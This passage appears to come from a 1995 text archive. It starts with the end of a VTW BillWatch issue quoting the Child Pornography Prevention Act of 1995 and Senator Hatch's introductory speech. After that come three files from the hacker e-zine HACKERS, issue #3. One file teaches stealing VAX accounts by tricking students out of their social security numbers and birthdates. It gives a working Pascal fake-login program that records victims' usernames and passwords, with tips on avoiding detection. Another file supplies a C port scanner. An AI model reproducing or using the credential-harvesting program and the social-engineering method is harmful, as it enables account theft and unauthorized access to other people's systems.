distribution, possession, or viewing of child pornography.
SEC. 3. DEFINITIONS.
Section 2256 of title 18, United States Code, is amended--
(1) in paragraph (2)(E), by inserting before the semicolon
the following: `, or the buttocks of any minor, or the breast
of any female minor';
(2) in paragraph (5), by inserting before the semicolon the
following: `, and data stored on computer disk or by electronic
means which is capable of conversion into a visual image';
(3) in paragraph (6), by striking `and';
(4) in paragraph (7), by striking the period and inserting `;
and'; and
(5) by adding at the end the following new paragraph:
`(8) `child pornography' means any visual depiction,
including any photograph, film, video, picture, drawing, or
computer or computer-generated image or picture, whether made
or produced by electronic, mechanical, or other means, of
sexually explicit conduct, where--
`(A) the production of such visual depiction involves the
use of a minor engaging in sexually explicit conduct;
`(B) such visual depiction is, or appears to be, of a
minor engaging in sexually explicit conduct; or
`(C) such visual depiction is advertised, promoted,
presented, described, or distributed in such a manner that
conveys the impression that the material is or contains a
visual depiction of a minor engaging in sexually explicit
conduct.'.
SEC. 4. PROHIBITED ACTIVITIES RELATING TO MATERIAL CONSTITUTING OR
CONTAINING CHILD PORNOGRAPHY.
(a) In General: Section 2252 of title 18, United States Code, is
amended to read as follows:
`Sec. 2252. Certain activities relating to material constituting or
containing child pornography
`(a) Any person who--
`(1) knowingly mails, transports, or ships in interstate or
foreign commerce by any means, including by computer, any child
pornography;
`(2) knowingly receives or distributes--
`(A) any child pornography that has been mailed, shipped,
or transported in interstate or foreign commerce by any
means, including by computer; or
`(B) any material that contains child pornography that
has been mailed, shipped, or transported in interstate or
foreign commerce by any means, including by computer;
`(3) knowingly reproduces any child pornography for
distribution through the mails, or in interstate or foreign
commerce by any means, including by computer;
`(4) either--
`(A) in the maritime and territorial jurisdiction of the
United States, or on any land or building owned by, leased
to, or otherwise used by or under the control of the United
States Government, or in the Indian country (as defined in
section 1151), knowingly sells or possesses with the intent
to sell any child pornography; or
`(B) knowingly sells or possesses with the intent to sell
any child pornography that has been mailed, shipped, or
transported in interstate or foreign commerce by any means,
including by computer, or that was produced using materials
that have been mailed, shipped, or transported in
interstate or foreign commerce by any means, including by
computer; or
`(5) either--
`(A) in the maritime and territorial jurisdiction of the
United States, or on any land or building owned by, leased
to, or otherwise used by or under the control of the United
States Government, or in the Indian country (as defined in
section 1151), knowingly possesses 3 or more books,
magazines, periodicals, films, videotapes, computer disks,
or any other material that contains any child pornography; or
`(B) knowingly possesses 3 or more books, magazines,
periodicals, films, videotapes, computer disks, or any
other material that contains any child pornography that has
been mailed, shipped, or transported in interstate or
foreign commerce by any means, including by computer,
shall be punished as provided in subsection (b).
`(b)(1) Whoever violates, or attempts or conspires to violate,
paragraphs (1), (2), (3), or (4) of subsection (a) shall be fined
under this title or imprisoned not more than 10 years, or both,
but, if such person has a prior conviction under this chapter or
chapter 109A, such person shall be fined under this title and
imprisoned for not less than 5 years nor more than 15 years.
`(2) Whoever violates paragraph (5) of subsection (a) shall be
fined under this title or imprisoned for not more than 5 years, or
both.'.
(b) Technical Amendment: The table of sections for chapter 110 of
title 18, United States Code, is amended by amending the item
relating to section 2252 to read as follows:
`2252. Certain activities relating to material constituting or
containing child pornography.'.
SEC. 5. PRIVACY PROTECTION ACT AMENDMENTS.
Section 101 of the Privacy Protection Act of 1980 (42 U.S.C.
2000aa) is amended--
(1) in subsection (a)(1), by inserting before the semicolon
at the end the following: `, or if the offense involves the
production, possession, receipt, mailing, sale, distribution,
shipment, or transportation of child pornography, the sexual
exploitation of children, or the sale or purchase of children
under section 2251, 2251A, or 2252 of title 18, United States
Code'; and
(2) in subsection (b)(1), by inserting before the semicolon
at the end the following: `, or if the offense involves the
production, possession, receipt, mailing, sale, distribution,
shipment, or transportation of child pornography, the sexual
exploitation of children, or the sale or purchase of children
under section 2251, 2251A, or 2252 of title 18, United States
Code'.
SEC. 6. SEVERABILITY.
If any provision of this Act, an amendment made by this Act, or
the application of such provision or amendment to any person or
circumstance is held to be unconstitutional, the remainder of this
Act, the amendments made by this Act, and the application of such
to any other person or circumstance shall not be affected thereby.
STATEMENTS OF INTRODUCED BILLS AND JOINT RESOLUTIONS (Senate -
September 13, 1995)
THE CHILD PORNOGRAPHY PREVENTION ACT OF 1995
Mr. HATCH. Mr. President, it is impossible for any decent American not
to be outraged by child pornography and the sexual exploitation of
children. Such material is a plague upon our people and the moral
fabric of this great Nation.
And, as a great Nation, I believe that we have both the constitutional
right and moral obligation to protect our children from those who,
motivated by profit or perversion or both, would abuse, exploit, and
degrade the weakest and most vulnerable members of our society.
Current Federal law dealing with child pornography reflects the
overwhelming bipartisan consensus which has always existed, both in
Congress and in the country, that there is no place for such filth
even in a free society and that those who produce or peddle this
reprehensible material must be made to feel the full weight of the law
and suffer a punishment reflective of the seriousness of their
offense.
As with many of our criminal statutes, however, effective enforcement
of our laws against child pornography today faces a new obstacle: The
criminal use, or misuse, of new technology which is outside the scope
of existing statutes. In order to close this computer-generated
loophole and to give our law enforcement authorities the tools they
need to stem the increasing flow of high-tech child pornography, I am
today introducing the Child Pornography Prevention Act of 1995.
The necessity for prompt legislative action amending our existing
Federal child pornography statutes to cover the use of computer
technology in the production of such material was vividly illustrated
by a recent story in the Washington Times. This story, dated July 23,
1995, reported the conviction in Canada of a child pornographer who
copied innocuous pictures of children from books and catalogs onto a
computer, altered the images to remove the childrens' clothing, and
then arranged the children into sexual positions. According to
Canadian police, these sexual scenes involved not only adults and
children, but also animals.
Even more shocking than the occurrence of this type of repulsive
conduct is the fact that, under current Federal law, those pictures,
depicting naked children involved in sex with other children, adults,
and even animals, would not be prosecutable as child pornography. That
is because current Federal child pornography and sexual exploitation
of children laws, United States Code title 18, sections 2251, 2251A,
and 2252, cover only visual depictions of children engaging in
sexually explicit conduct whose production involved the use of a minor
engaging in such conduct; materials such as photographs, films, and
videotapes.
Today, however, visual depictions of children engaging in any
imaginable forms of sexual conduct can be produced entirely by
computer, without using children, thereby placing such depictions
outside the scope of Federal law. Computers can also be used to alter
sexually explicit photographs, films, and videos in such a way as to
make it virtually impossible for prosecutors to identify individuals,
or to prove that the offending material was produced using children.
The problem is simple: While Federal law has failed to keep pace with
technology, the purveyors of child pornography have been right on line
with it. This bill will help to correct that problem.
The Child Pornography Prevention Act of 1995, which includes a
statement of congressional findings as to harm, both to children and
adults, resulting from child pornography, has three major provisions.
First, it would amend United States Code title 18, section 2256, to
establish, for the first time, a specific, comprehensive, Federal
statutory definition of child pornography. Under this bill, any visual
depiction, such as a photograph, film, videotape or computer image,
which is produced by any means, including electronically by computer,
of sexually explicit conduct will be classified as child pornography
if: (a) its production involved the use of a minor engaging in
sexually explicit conduct; or (b) it depicts, or appears to depict, a
minor engaging in sexually explicit conduct; or (c) it is promoted or
advertised as depicting a minor engaging in sexually explicit conduct.
_________________________________________________________________ __________
SUBSCRIPTION AND REPRODUCTION INFORMATION
*** Know of someone ANYWHERE with a fax machine but without net ***
*** access that's interested in VTW's issues? Tell them to ***
*** call and get on our weekly fax distribution list at ***
*** (718) 596-2851 (or email us their fax number). ***
To get on the distribution list for BillWatch, send mail to
listproc@vtw.org with "subscribe vtw-announce Firstname Lastname"
in the subject line.
To unsubscribe from BillWatch (and all other VTW publications)
send mail to listproc@vtw.org with "unsubscribe vtw-announce"
in the subject line.
Email vtw@vtw.org with "send billwatch" in the SUBJECT LINE
to receive the latest version of BillWatch
For permission to reproduce VTW alerts contact vtw@vtw.org
_________________________________________________________________ __________
End VTW BillWatch Issue #18, Date: Sun Sep 17 16:36:37 EDT 1995
_________________________________________________________________ __________
This file provided by:
Voters Telecommunications Watch
*** Watching out for your civil liberties ***
Email: vtw@vtw.org (preferred)
Gopher: gopher -p1/vtw gopher.panix.com
URL: http://www.vtw.org/
Telephone: (718) 596-2851 (last resort)
================================================================= ==========
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #3, File #7 of 9
A VMS Login Spoof
By: Talonphish
----------------------------------------------------------------- ------------
When I read last months issue of HACKERS, I was excited to see
the article about VAX hacking. One thing I noticed was that to use most,
if not all of the things spoken about in the article, you had to already
have a privileged account. This left open one question, Just how does
one go about getting a privileged account on a VAX system? That is where
this article picks up.
It has been said that to completly secure a system you would need
to shut it down and lock it up. In other words, not let anyone use it or
even get near it. It has also been said that the weakest link in a
secure system is the system users. This even holds true for VAX, which
is almost considered a swear word by many because it is supposedly
"unhackable". Not the case.
GETTING AN ACCOUNT.
-------------------------
The first thing a person needs to do in order to do anything with
a VAX is obviously to get an account. It doesn't have to be a privileged
account, any account will do.
The best way to do this would be to perform a little Social
Engineering. Shoulder surfing should do the trick. If that is
impossible, then just do something similar to what I did.
At a certain college running VAX, all freshman students passwords
were their birthdate in the form 041975, until they changed them. All
usernames for students were their first initial, last 6 digits of their
social security number, and their last initial. Most freshman students
are somewhat computer illiterate, and never change their passwords.
Therefore, all you needed to do to get an account, was to look at their
drivers licence, or conduct a little survey (not in the computer lab)
asking students questions about major etc.. and just dropping in a
question of their soc. number and birthday.. The moral? Often a person
doesnt need to look to holes, or other stupid bugs posted on the net
that anyone can abuse, but to yourself and your own imagination to gain
needed information.
ONCE YOU HAVE AN ACCOUNT.
----------------------------
Once you have an account, be it yours or someone elses, you want
to gain priviliges or at least an account that isn't yours to use.
Assuming that your account is just a basic user account with no special
priv's, you need to devise a plan to get a different account. Now you
need to do a little research. Where do people with priviliged accounts
log in from? ie.. Professors. Once you know this, you can steal their
accounts fairly easily with a little program. All you need to know is
what the login screens look like. Here is a VERY simple pascal program
that will write the username and password to a file called outfile.
!!!WARNING!!! This is not an amazing program, if you are
going to use it, don't use it from your account! You should also add
lines to the file login.com that will log out the account should anyone
break out of the program and type things such as directory, show users,
or anything else normally typed. You don't want people to know which
account you are on. I also changed the prompt so it said "ERROR, TURN
OFF TERMINAL AND REEBOOT" You can do this by typing Set prompt:== "whatever"
from the $ prompt.
begin program
----------------------------------------------------------------- -----------
program snag(input,output,outfile);
type
str20= varying[20] of char;
var
outfile:file;
I:integer;
cvax,username,password:str20;
begin
rewrite outfile;
write('Local> ');
readln(cvax); {this simulates the login screen}
writeln('Local -010- session 1 to VAX on node OMEGA established');
writeln('Somewhere University of XX');
writeln('Computing and Communications Center');
writeln('Unauthorized Access Prohibited'); {ain't it the truth}
write('Username: ');
readln(username);
write('Password: ');
readln(password);
write(outfile,username);
write(outfile,password);
writeln('ERROR x99503b, Please turn off terminal and reeboot');
close outfile;
for I=1 to 100 do
readln; {prevents person from hitting keys and going
back to shell}
end.
--------------------------------------------------------------
end program..
Run in the right place at the right time and viola, priviliged
access. Then use the things you learned in issue #2 of HACKERS and
hack away.
*note* This program did not turn off echo from keyboard to
screen for the input of password, this could be a dead giveaway. I
suggest rewriting the code(in a better language). This is only an
example.
In closing,
No system will ever be secure and useful at the same
time.
Talonphish
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #3, File #8 of 9
Remote Host Probing
By: IOERROR
The enclosed program, 100% my own code, will probe port 1-1024 on the given
host (call it as: % tcpprobe connected.com) and report on which hosts accept
connections. It may require a little tweaking to work on some of the oddball
Unixes like SunOS... I wrote it under Linux.
-----BEGIN-----cut here-----
/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
int main(int argc, char **argv)
{
int probeport = 0;
struct hostent *host;
int err, i, net;
struct sockaddr_in sa;
if (argc != 2) {
printf("Usage: %s hostname\n", argv[0]);
exit(1);
}
for (i = 1; i < 1024; i++) {
strncpy((char *)&sa, "", sizeof sa);
sa.sin_family = AF_INET;
if (isdigit(*argv[1]))
sa.sin_addr.s_addr = inet_addr(argv[1]);
else if ((host = gethostbyname(argv[1])) != 0)
strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);
else {
herror(argv[1]);
exit(2);
}
sa.sin_port = htons(i);
net = socket(AF_INET, SOCK_STREAM, 0);
if (net < 0) {
perror("\nsocket");
exit(2);
}
err = connect(net, (struct sockaddr *) &sa, sizeof sa);
if (err < 0) {
printf("%s %-5d %s\r", argv[1], i, strerror(errno));
fflush(stdout);
} else {
printf("%s %-5d accepted. \n", argv[1], i);
if (shutdown(net, 2) < 0) {
perror("\nshutdown");
exit(2);
}
}
close(net);
}
printf(" \r");
fflush(stdout);
return (0);
}
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #3, File #9 of 9
The End
As I said in the intro, I've moved, so from now on direct all snail
mail to Room #621A, Redwood Hall, 186 Bleeker St., Newark, NJ 07103. My
new phone number is (201) 565-9145, and if you live in NYC, I'll see you at
2600, hopefully. As always, if you've got an article or two, send them over
to scanlonr@delphi.com. We still have not had enough reader response, good
or bad, to justify a letters column, so if you have anything to say about the
mag, or have any questions about Hacking as a whole, send them on in. So
until next month, where ever you hack, may the ethic be with you....
* * * * * * * * * * * * * * * * * * * *
